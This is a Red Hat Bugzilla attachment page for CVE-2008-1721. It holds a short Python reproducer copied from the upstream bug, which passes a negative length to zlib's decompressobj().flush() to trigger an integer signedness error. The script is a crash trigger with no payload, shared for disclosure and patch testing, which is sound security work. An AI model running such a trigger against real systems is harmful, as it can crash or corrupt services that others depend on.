Login
[x]
Log in using an account from:
Fedora Account System
Red Hat Associate
Red Hat Customer
Or login using a Red Hat Bugzilla account
Forgot Password
Login:
Hide Forgot
Create an Account
Red Hat Bugzilla – Attachment 303502 Details for
Bug 442005
CVE-2008-1721 python: integer signedness error in the zlib extension module
[?]
New
Simple Search
Advanced Search
My Links
Browse
Requests
Reports
Current State
Search
Tabular reports
Graphical reports
Duplicates
Other Reports
User Changes
Plotly Reports
Bug Status
Bug Severity
Non-Defaults
|
Product Dashboard
Help
Page Help!
Bug Writing Guidelines
What's new
Browser Support Policy
5.0.4.rh83 Release notes
FAQ
Guides index
User guide
Web Services
Contact
Legal
This site requires JavaScript to be enabled to function correctly, please enable it.
Copy of the reproducer from the upstream bug
signedness.py (text/plain), 1.36 KB, created by
Tomas Hoger
on 2008-04-23 15:06:21 UTC
(
hide
)
Description:
Copy of the reproducer from the upstream bug
Filename:
MIME Type:
Creator:
Tomas Hoger
Created:
2008-04-23 15:06:21 UTC
Size:
1.36 KB
patch
obsolete
>#!/usr/bin/python > >import zlib > >msg = """ >Society in every state is a blessing, but government even in its best > state is but a necessary evil >in its worst state an intolerable one; for when we suffer, or are > exposed to the same miseries by a >government, which we might expect in a country without government, our > calamities is heightened by >reflecting that we furnish the means by which we suffer! Government, > like dress, is the badge of >lost innocence; the palaces of kings are built on the ruins of the > bowers of paradise. For were >the impulses of conscience clear, uniform, and irresistibly obeyed, man > would need no other >lawgiver; but that not being the case, he finds it necessary to > surrender up a part of his property >to furnish means for the protection of the rest; and this he is induced > to do by the same prudence which >in every other case advises him out of two evils to choose the least. > Wherefore, security being the true >design and end of government, it unanswerably follows that whatever form > thereof appears most likely to >ensure it to us, with the least expense and greatest benefit, is > preferable to all others. >""" * 1024 > >compMsg = zlib.compress(msg) >bad = -2 >decompObj = zlib.decompressobj() >decompObj.decompress(compMsg, 1) >decompObj.flush(bad)
You cannot view the attachment while viewing its details because your browser does not support IFRAMEs.
View the attachment on a separate page
.
View Attachment As Raw
Actions:
View
Attachments on
bug 442005
:
303501
| 303502